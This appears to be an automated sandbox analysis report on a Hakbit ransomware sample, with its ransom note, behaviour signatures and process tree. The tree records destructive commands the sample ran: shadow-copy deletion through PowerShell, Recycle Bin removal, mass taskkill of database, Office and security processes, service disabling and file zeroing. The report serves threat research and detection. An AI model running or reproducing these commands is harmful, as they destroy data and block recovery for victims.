Analysis

  • max time kernel
    1788s
  • max time network
    1786s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-11-2020 14:34

General

  • Target

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note
To recover your data contact the email below [email protected] Key Identifier: AurLkNjAgbjanuDB/60MzNmn2c/YqPxL1asGmTG80+NCkBjZ2vXLtGUaqQTTP4IPFTyMtTI85kPMGqZ/X2wFDQUfMrKg9pzhk6mXJw7UibHl+wzHclZTbOUc16lkPinb5sMOtFkvKTS73MC5d733N7iTAyBf/D9rfqIO4VqVd5YdAeNOMw/IRvn3ifZyNPWHYKDhT/1C86gRrumhYZJkF2sbHd3CM1dpUlMDWIMSs8K16e7A1Ra2tzfbjg8z305vg7X+4IwTBnu1Sbm5YstbWZBB3k7OOlLLCH/y5+kXRi+xIKzFPBflFwlg4MKqqNj/UO2s26NWfMeqouuF9mxV1MgEEGESP9btTLyX+1xJZLY/W+OF14R3JBbqbw7G2e8j8EPB0wTgYnTmejhJUAcSTJJ/AIQrqPpCk/XgHDxzITuUEgDivP8jGIFha42gO3tXAeAQ/2sfD/wuomlDT8UGSHIgoG7Cq3RrHJDL/8yzJQrXN/H4450nuoU1CgMTRaIFgqKIZb/FeIr9jIsi/0CK/MH+QDaRvLAr+2Dfkje7UcxAa02dHx1jXc7VOFqAKdghfecAok9OWsnUjnnStgY/cxzi9uHySdRkRO2WUYcIhpvMCIJLJec3OJD0x5ip0Z6d7gI+kg3vyp2iLyQ4/QpZdERb1+uoqU+aLPywnlPJDbw= Number of files that were processed is: 1274

Signatures

  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 47 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
    "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
        PID:3820
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
        2⤵
          PID:2932
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
          2⤵
            PID:1696
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SQLWriter start= disabled
            2⤵
              PID:3428
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SstpSvc start= disabled
              2⤵
                PID:2960
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mspub.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:200
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopqos.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1476
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3196
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mysqld.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1344
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqbcoreservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2248
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM firefoxconfig.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2292
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM agntsvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2312
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM thebat.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3384
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM steam.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3976
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM encsvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2364
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM excel.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2896
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM CNTAoSMgr.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3184
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlwriter.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3920
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM tbirdconfig.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2844
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM dbeng50.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2972
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM thebat64.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4084
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM ocomm.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1268
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM infopath.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2456
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mbamtray.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4044
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM zoolz.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4048
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" IM thunderbird.exe /F
                2⤵
                • Kills process with taskkill
                PID:2104
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM dbsnmp.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4116
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM xfssvccon.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4196
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mspub.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4240
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM Ntrtscan.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4260
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM isqlplussvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4300
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM onenote.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4348
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM PccNTMon.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4384
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM msaccess.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4428
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM outlook.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4504
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM tmlisten.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4548
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM msftesql.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4600
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM powerpnt.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4632
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopqos.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4692
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM visio.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4716
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4756
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM winword.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4784
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mysqld-nt.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4868
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM wordpad.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4936
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mysqld-opt.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4964
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM ocautoupds.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5004
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM ocssd.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5076
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM oracle.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3428
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlagent.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4256
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlbrowser.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4268
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlservr.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5584
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM synctime.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5596
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5688
              • C:\Windows\System32\notepad.exe
                "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                2⤵
                • Opens file in notepad (likely ransom note)
                PID:5416
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                2⤵
                  PID:5116
                  • C:\Windows\system32\PING.EXE
                    ping 127.0.0.7 -n 3
                    3⤵
                    • Runs ping.exe
                    PID:4840
                  • C:\Windows\system32\fsutil.exe
                    fsutil file setZeroData offset=0 length=524288 “%s”
                    3⤵
                      PID:4352
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
                    2⤵
                      PID:5004
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 3
                        3⤵
                          PID:6328

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

  • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
